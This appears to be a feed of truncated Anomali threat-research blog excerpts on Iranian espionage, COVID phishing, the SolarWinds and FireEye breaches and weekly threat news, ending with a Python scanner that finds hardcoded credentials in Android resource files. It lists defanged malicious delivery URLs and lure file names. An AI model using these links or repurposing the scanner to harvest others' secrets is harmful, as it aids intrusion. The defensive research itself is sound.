Anomali.webp 2021-02-10 16:34:00 Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies (lien direct) ScreenConnect Remote Access Tool Utilizing Ministry of Foreign Affairs-Themed EXEs and URLs Authored by: Gage Mele, Winston Marydasan, and Yury Polozov Key Findings Anomali Threat Research identified a campaign targeting government agencies in the United Arab Emirates (UAE) and likely the broader Middle East. We assess that the Iran-nexus cyberespionage group Static Kitten is behind this activity, based on Israeli geopolitical-themed lures, Ministry of Foreign Affairs (MOFA) references, and the use of the file-storage service Onehub, which was attributed to the group’s previous campaign known as Operation Quicksand.[1] The objective of this activity is to install a remote management tool called ScreenConnect (acquired by ConnectWise in 2015) with unique launch parameters that have custom properties. Malicious executables and URLs used in this campaign masquerade as the Ministry of Foreign Affairs (MOFA) of Kuwait (mofa.gov[.]kw). Another sample, including only MOFA (mfa.gov), could be used for broader government targeting. Overview Anomali Threat Research has uncovered malicious activity very likely attributable to the Iran-nexus cyberespionage group Static Kitten (Seedworm, MERCURY, Temp.Zagros, POWERSTATS, NTSTATS, MuddyWater), which is known to target numerous sectors primarily located in the Middle East.[2] This new campaign, which uses tactics, techniques, and procedures (TTPs) consistent with previous Static Kitten activity, uses ScreenConnect launch parameters designed to target any MOFA with mfa[.]gov as part of the custom field. We found samples specifically masquerading as the Kuwaiti government and the UAE National Council respectively, based on references in the malicious samples. In mid-2020, the UAE and Israel began the process of normalizing relations. 
Since then, tensions have further escalated in the region, as reported by numerous sources. The targeting of Kuwait could be tied to multiple factors, including Kuwait’s MOFA making a public statement that they were willing to lead mediation between Iran and Saudi Arabia.[3] Furthermore, in October 2020, trade numbers for a peace deal between Israel and UAE included an estimate for the creation of 15,000 jobs and $2 billion in revenue on each side.[4] In that same month, Static Kitten reportedly conducted Operation Quicksand, which targeted prominent Israeli organizations and included the use of file-storage service OneHub.[5] Details We identified two lure ZIP files being used by Static Kitten designed to trick users into downloading a purported report on relations between Arab countries and Israel, or a file relating to scholarships. The URLs distributed through these phishing emails direct recipients to the intended file storage location on Onehub, a legitimate service known to be used by Static Kitten for nefarious purposes.[6] Anomali Threat Research has identified that Static Kitten is continuing to use Onehub to host a file containing ScreenConnect. The delivery URLs found to be part of this campaign are: ws.onehub[.]com/files/7w1372el ws.onehub[.]com/files/94otjyvd File names in this campaign include: تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod[.]gov.kw.ZIP تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod[.]gov.kw.exe الدرا Ransomware Malware Tool Threat Studies Guideline
Anomali.webp 2021-02-02 23:04:00 Threat Actors Capitalize on COVID-19 Vaccine News to Run Campaigns, AWS Abused to Host Malicious PDFs (lien direct) Key Findings Malicious actors have targeted the vaccine supply chain and leaked materials stolen from the European Medicines Agency (EMA). Phishing campaigns have evolved alongside the pandemic, with the latest observed themes being vaccine-related topics. Users should remain cautious of possible phishing attacks via email, text messages (SMS), or search results. Overview Threat actors change and adapt their campaigns to mirror themes prevalent in the public eye; when they leverage high-urgency trends, their success rates rise. Since the beginning of the pandemic, Anomali has focused resources on detecting malicious cyber campaigns that use COVID-19 themes. In this blog, Anomali Threat Research presents several malicious samples that represent the simple tactics, techniques, and procedures (TTPs) used by actors in COVID-themed malspam campaigns. Less-sophisticated threat actors are easier to monitor and block when the TTPs they use are well known. New Discoveries The majority of this research centers on analysis of known threat actors and indicators of compromise (IOCs). Several samples appear to be newly discovered by our researchers (we have not seen them discussed elsewhere). Among these are several malicious PDFs hosted on Amazon Web Services (AWS) and other hosting websites. We discuss this campaign below in the section named "2.c. Alternative channel: Online PDF Search Engine Optimization (SEO)", detailing samples with the titles "Adenovirus vector pdf" and "Illinois coronavirus october 15". Details 1.
Targeted Supply Chain Attacks On December 28, 2020, the US Treasury Department's Financial Crimes Enforcement Network (FinCEN) published a notice entitled "COVID-19 Vaccine-Related Scams and Cyberattacks." That notice provided evidence of actors running scams that ask for a fee to provide potential victims with the vaccine sooner than permitted. Furthermore, FinCEN assessed that cybercriminals will likely continue to exploit the COVID-19 pandemic to target financial institutions, vaccine delivery operations, and vaccine manufacturing supply chains. FinCEN is aware of ransomware directly targeting vaccine research and has pushed for awareness of phishing schemes that lure victims with fraudulent information about COVID-19 vaccines.[1] Other threats to vaccine research have been reported by US and European intelligence agencies. In December 2020, threat actors breached the European Medicines Agency (EMA) while it was evaluating COVID-19 vaccines. On January 12, 2021, threat actors leaked a portion of the stolen materials regarding the Pfizer/BioNTech vaccine (Figure 1).[2] On the same day, in an unrelated event, the Director of the National Counterintelligence and Security Center (NCSC), William Evanina, confirmed the existence of threats from China and Russia to disrupt the US coronavirus vaccine supply chain.[3] Figure 1 – Screenshot of the Files in the EMA Vaccine Breach The publication of the EMA breach data on RaidForums was taken down by forum administrators, only to resurface on other platforms. Later, the EMA stated that at least some of the leaked correspondence had "been manipulated by the perpetrators prior to publication in a way which could undermine trust in vaccines."[4] 2. Non-targeted Adoption by Phishing Campaigns Below are three examples of COVID-19 vaccine-related phishing campaigns using different delivery methods: email, SMS, and search engine traffic.
As COVID-19 vaccination is a newsworthy topic, it would be consistent with observed activity for so Ransomware Spam Malware Threat Guideline
Anomali.webp 2020-12-17 18:00:00 FireEye, SolarWinds Hacks Show that Detection is Key to Solid Defense (lien direct) Several years back, industry analyst firm Gartner began circulating the idea that almost every major enterprise and government agency either was already compromised or would be compromised at some point. This week, when we woke up to the news that FireEye and SolarWinds had joined the ranks of the hacked, we learned once again that Gartner was right. Even companies with advanced security expertise and expansive resources cannot escape this inevitable fact of digital life. Forensic experts and news outlets are now following the trail of digital clues, trying to make sense of how both companies ended up on the hacked side of the equation. At a high level, we know that FireEye was compromised by a state-sponsored adversary. In the case of SolarWinds, it looks like an adversary was able to dwell in victims' networks for as long as nine months, and the prime suspect is the Kremlin. There are undoubtedly many organizations wondering whether they are caught up in the attacks, either by design or indirectly. Fortunately, those that have effective threat detection capabilities in place can use the information FireEye, SolarWinds, Anomali and other threat research organizations are providing to determine whether they have been hit. Anomali customers are already ahead of the game. As soon as the world becomes aware of an attack, Anomali Threat Research immediately front-loads Anomali ThreatStream with a threat bulletin that provides a detailed and concise narrative of the situation along with a comprehensive list of the known indicators of compromise (IOCs). Once added, information relevant to the incident (IOCs, reports from the security community, signatures, etc.) is automatically delivered to customers. This gives them the ability to automate threat detection and blocking across their security controls, including EDR, firewalls, and SIEM.
In addition, customers using Anomali Match, our threat detection and response product, can use the threat intelligence to run a retrospective search back to when the threat was active, getting real-time results showing whether the threat was seen in their network at that time. To give threat intelligence and security operations analysts a look at what an Anomali threat bulletin looks like, we have added the first version of the FireEye threat bulletin to this blog. We are happy to discuss in more depth how Anomali customers are using this information and its continual updates to detect the presence of related IOCs in their environments. Reach us at general@anomali.com. For a more in-depth conversation on the incident and how threat intelligence aids in detection, listen to this week's Anomali Detect Podcast. Key Findings Unknown, sophisticated actors stole more than 300 FireEye Red Team tools and countermeasures (signatures) on an unspecified date. An unnamed source for The Washington Post claimed Cozy Bear (APT29) is responsible, but provided no evidence. The actor(s) were also interested in FireEye customers, specifically government entities. The Red Team countermeasures consist of custom versions of known tools, a prioritized Common Vulnerabilities and Exposures (CVE) list, and malware signatures in the ClamAV, HXIOC, Snort, and YARA languages. The stolen tools could be customized by actors, just as the FireEye Red Team customized existing tools. Malware Threat Guideline APT 29
Anomali.webp 2020-12-17 15:00:00 Anomali December Release: The Need for Speed (lien direct) We are happy to announce the Anomali Quarterly Release for December 2020. To deliver this latest set of features and enhancements, our product and engineering teams worked closely with our customers, with a particular eye to further improving the speed of threat intelligence operations. As organizations mature in their threat intelligence programs and seek to leverage ever-larger quantities of threat intelligence inputs and security telemetry data, capabilities that enhance the efficiency of threat intelligence and SOC analysts become paramount. So we worked (and will continue to work) to reduce friction in the moment-to-moment workday of our users and add velocity to overall workflows in a way that improves their organizations' overall security posture. Examples of enhancements in this latest release include: Pre-Built Themed Dashboards The addition of pre-customized, themed dashboards allows analysts to quickly focus on new and relevant intelligence investigations about specific events impacting their organizations. Anomali Threat Research analysts applied their expertise to aid in the design and development of these dashboards for real-world investigation scenarios. Now available via the Anomali ThreatStream threat intelligence platform (TIP), new dashboard themes include COVID-19 indicators of compromise (IOCs), relevant global cyberthreat activities, and a view of the vulnerabilities and exploits that adversaries are using to compromise your systems and data. Figure 1 - Example COVID-19 IOCs focused dashboard Figure 2 - Example Global Threat Activity dashboard Flexible MITRE ATT&CK Framework Coverage: with this new capability, threat intelligence analysts can configure their security coverage levels for each technique in the framework.
This allows them to align their work more precisely with targeted organizational security response strategies, which removes friction and increases the speed of overall workflows. Figure 3 - Analysts can tune security coverage for each MITRE ATT&CK technique Faster Investigations To continue making threat analysts' lives easier and more productive, we have added a Threat Card feature that allows users to gain deeper insights into threats without having to navigate to additional pages, and we have also improved collaboration in active investigations by introducing visibility and access controls. Analysts can mark their Investigations as "Private" until completed, and optionally increase the visibility to their workgroups or their organization. While a user is editing an Investigation, it can be locked so that other team members do not duplicate effort. Threat analysts also now have greater control over the UI via added mouse functionality, the type of utility that helps them move more quickly through an investigation. Figure 4 - Active investigations benefit from Threat Cards and privacy controls Faster Finished Intelligence Anomali ThreatStream now offers multiple default templates for the creation of finished intelligence products, giving analysts the ability to apply their organizations' branding to reports and then distribute them directly from ThreatStream to all relevant stakeholders. This added feature gives analysts a simpler, more intuitive and faster way to format and distribute the insights and findings they have developed. Tool Threat Guideline
Anomali.webp 2020-10-01 22:15:00 Cybersecurity Awareness Month Starts Today, #BECYBERSMART (lien direct) Welcome to National Cybersecurity Awareness Month (NCSAM)! The month's original purpose has been obscured somewhat by marketing and PR teams hijacking it, but it remains a worthy cause. NCSAM is a collaboration between the United States Cybersecurity and Infrastructure Security Agency (CISA) and the National Cyber Security Alliance (NCSA). It is designed to encourage government, business, and consumers to consider the cybersecurity implications inherent in their connected activities and lives. This year's theme is "Do Your Part. #BECYBERSMART." "This theme encourages individuals and organizations to own their role in protecting their part of cyberspace, stressing personal accountability and the importance of taking proactive steps to enhance cybersecurity," according to CISA and the NCSA. At Anomali, the purpose of NCSAM is, of course, our daily focus. We constantly deliver customer-centric product improvements. We provide the security community with free threat research and analysis that is used broadly to reduce risk. We strive to ensure that public and private sector organizations can leverage intelligence that helps them know and detect their adversaries. Over the past several months, we have accomplished many things we believe are worth noting in light of the month. By naming these, are we guilty of doing a bit of hijacking ourselves? Yes. However, some of what is listed are also critical security resources available to any organization interested in reducing its risk of cyberattacks and learning more about how it can operationalize intelligence. Here is a look at our record since March: October 1 – The State of Oklahoma's Office of Management and Enterprise Services (OMES) activated its new Information Sharing and Analysis Center (ISAC).
Powered by Anomali ThreatStream Community Edition, it provides the state's government and corporate-partner entities with immediate access to intelligence about the most serious threats targeting their operations. All agencies are under constant assault from massive waves of cyberattacks that impact citizens, police departments, municipalities, election precincts, and remote workers. With the ability to share information about adversaries, essential state services can reduce their risk of falling victim to disruptive and costly attackers. September 24 – With threat intelligence now recognized as critical to security and risk, global analyst firm Frost & Sullivan produced the Frost Radar: Global Threat Intelligence Platform Market, 2020, a report highlighting eight key players in the market as well as its overall size. Anomali was recognized as the leader, with 40 percent market share, and as such was named the Frost Radar: 2020 Innovation Excellence Award winner in the space. September 21 – Anomali was recognized in the Gartner Market Guide for Security Orchestration, Automation and Response Solutions (SOAR). SOAR is described as a market made up of solutions that combine incident response, orchestration and automation, and threat intelligence (TI) management capabilities in a single platform. Anomali ThreatStream, our leading Threat Intelligence Platform (TIP) solution, was recognized for its recently added SOAR capabilities. August 25 – With an ear wide open to customers, our product team delivered the next phase of what is needed in the market. With our Malware Threat Guideline ★★★★★
Anomali.webp 2020-09-22 15:00:00 Weekly Threat Briefing: Android Malware, APT Groups, Election Apps, Ransomware and More (lien direct) The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Cerberus Source Code Leak, Chinese APT, Mrbminer Malware, and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence US 2020 Presidential Apps Riddled with Tracking and Security Flaws (published: September 17, 2020) The Vote Joe 2020 application has been found to be potentially leaking personal data about voters. The app is used by the Joe Biden campaign to engage with voters and to get supporters to send out promotional text messages. The app retrieves voter predictions from TargetSmart, a data intelligence service, via an API endpoint that was found to return additional data: both voter preference and voter prediction could be seen, and while voter preference is publicly accessible, the TargetSmart information was not meant to be publicly available. The app also let users outside the United States download it, and as there was no email verification, non-US citizens could access the data. Vote Joe is not the only campaign app with security issues: the Donald Trump application exposed hardcoded secret keys in its APK. Recommendation: The exposure of Personally Identifiable Information (PII) requires affected individuals to take precautionary measures to protect their identity and their finances. Identity theft services can assist in preventing illicit purchases, or applications for financial services, by actors using stolen data.
Tags: APK, Android, Campaign, Election, Joe Biden, PII German Hospital Attacked, Patient Taken to Another City Dies (published: September 17, 2020) A failure of IT systems at Duesseldorf University Hospital in Germany has led to the death of a woman. In an apparent ransomware attack, the hospital's systems crashed and staff were unable to access data. No ransom demand was apparent, but 30 servers at the hospital had been encrypted the previous week, and a note left on one server was addressed to Heinrich Heine University. Duesseldorf police contacted the perpetrators to inform them that they had attacked the hospital instead of the university, and the perpetrators provided decryption keys; however, patients had to be rerouted to other hospitals, which meant a long delay before they were treated by doctors. Recommendation: Educate your employees on the risks of opening attachments from unknown senders. Anti-spam and antivirus applications from trusted vendors should also be employed. Emails received from unknown senders should be treated with caution, and attachments from such senders should not be opened. Furthermore, it is important to have a comprehensive and tested backup solution in place, in addition to a business continuity plan for the unfortunate case of a ransomware infection. MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486 Tags: Germany, Healthcare, Hospital, Ransomware Ransomware Malware Vulnerability Threat Patching Guideline APT 41 ★★★★★
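The "hardcoded secret keys in the APK" finding in the election-apps story above is the kind of defect a scan of decoded resources catches before release. The Python below is an added example, not code from the briefing or from either campaign app: it parses a constructed res/values/strings.xml (in the form apktool decodes it; the two key values are the non-functional example credentials from AWS's own documentation) and flags strings whose resource name suggests a credential and whose value is long and high-entropy, plus anything shaped like an AWS access key ID. The same check can be pointed at decompiled BuildConfig constants or bundled .properties files.

```python
"""Scan decoded Android resources for hardcoded secrets.

Added example: the strings.xml below is constructed, and the two key values
are the documented non-functional AWS example credentials.
"""
import math
import re
import xml.etree.ElementTree as ET

# Constructed sample of res/values/strings.xml as apktool would decode it.
SAMPLE_STRINGS_XML = """<resources>
    <string name="app_name">CampaignApp</string>
    <string name="welcome_text">Welcome back</string>
    <string name="aws_access_key">AKIAIOSFODNN7EXAMPLE</string>
    <string name="aws_secret_key">wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY</string>
    <string name="api_base_url">https://api.example.com/v1/</string>
</resources>
"""

# Resource names that usually hold credentials.
SECRET_NAME_RE = re.compile(r"(secret|token|api_?key|access_?key|password|private_?key)", re.I)
# AWS access key IDs have a fixed, recognisable shape.
AWS_AKID_RE = re.compile(r"\bAKIA[0-9A-Z]{16}\b")


def shannon_entropy(value: str) -> float:
    """Bits per character; random keys sit well above natural-language text."""
    if not value:
        return 0.0
    counts = {}
    for ch in value:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def find_hardcoded_secrets(strings_xml: str, min_len: int = 20, min_entropy: float = 3.5):
    """Return (resource name, value, reasons) for every suspicious <string> element."""
    findings = []
    root = ET.fromstring(strings_xml)
    for el in root.iter("string"):
        name = el.get("name", "")
        value = (el.text or "").strip()
        reasons = []
        if AWS_AKID_RE.search(value):
            reasons.append("aws-access-key-id")
        # A credential-looking name holding a long, space-free, high-entropy value.
        if (SECRET_NAME_RE.search(name) and len(value) >= min_len
                and " " not in value and shannon_entropy(value) >= min_entropy):
            reasons.append("high-entropy-value-under-credential-name")
        if reasons:
            findings.append((name, value, reasons))
    return findings


if __name__ == "__main__":
    for name, value, reasons in find_hardcoded_secrets(SAMPLE_STRINGS_XML):
        print(f"{name}: {value[:8]}... ({', '.join(reasons)})")
```

The entropy threshold of 3.5 bits per character and the 20-character minimum are assumptions chosen to separate random keys from ordinary UI strings; tune them against your own codebase, and treat every hit as a lead to verify, not a confirmed leak.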
Last update at: 2024-06-16 13:10:34